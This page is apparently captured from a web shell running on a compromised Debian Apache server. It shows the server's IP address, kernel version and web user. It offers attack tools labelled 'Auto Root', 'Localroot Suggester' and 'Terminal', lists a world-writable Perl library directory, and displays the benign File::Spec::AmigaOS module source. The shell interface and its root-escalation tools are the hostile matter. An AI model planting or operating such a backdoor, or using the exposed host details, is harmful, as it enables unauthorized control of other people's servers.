Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
x86_64-linux-gnu /
perl /
5.24.1 /
File /
Spec /
Delete
Unzip
Name
Size
Permission
Date
Action
AmigaOS.pm
1002
B
-rwxrwxrwx
2020-06-20 19:33
Cygwin.pm
3.55
KB
-rwxrwxrwx
2020-06-20 19:33
Epoc.pm
1.56
KB
-rwxrwxrwx
2020-06-20 19:33
Functions.pm
2.34
KB
-rwxrwxrwx
2020-06-20 19:33
Mac.pm
22.42
KB
-rwxrwxrwx
2020-06-20 19:33
OS2.pm
6.71
KB
-rwxrwxrwx
2020-06-20 19:33
Unix.pm
9.78
KB
-rwxrwxrwx
2020-06-20 19:33
VMS.pm
15.91
KB
-rwxrwxrwx
2020-06-20 19:33
Win32.pm
10.98
KB
-rwxrwxrwx
2020-06-20 19:33
Save
Rename
package File::Spec::AmigaOS; use strict; use vars qw(@ISA $VERSION); require File::Spec::Unix; $VERSION = '3.64'; $VERSION =~ tr/_//d; @ISA = qw(File::Spec::Unix); =head1 NAME File::Spec::AmigaOS - File::Spec for AmigaOS =head1 SYNOPSIS require File::Spec::AmigaOS; # Done automatically by File::Spec # if needed =head1 DESCRIPTION Methods for manipulating file specifications. =head1 METHODS =over 2 =item tmpdir Returns $ENV{TMPDIR} or if that is unset, "/t". =cut my $tmpdir; sub tmpdir { return $tmpdir if defined $tmpdir; $tmpdir = $_[0]->_tmpdir( $ENV{TMPDIR}, "/t" ); } =item file_name_is_absolute Returns true if there's a colon in the file name, or if it begins with a slash. =cut sub file_name_is_absolute { my ($self, $file) = @_; # Not 100% robust as a "/" must not preceded a ":" # but this cannot happen in a well formed path. return $file =~ m{^/|:}s; } =back All the other methods are from L<File::Spec::Unix>. =cut 1;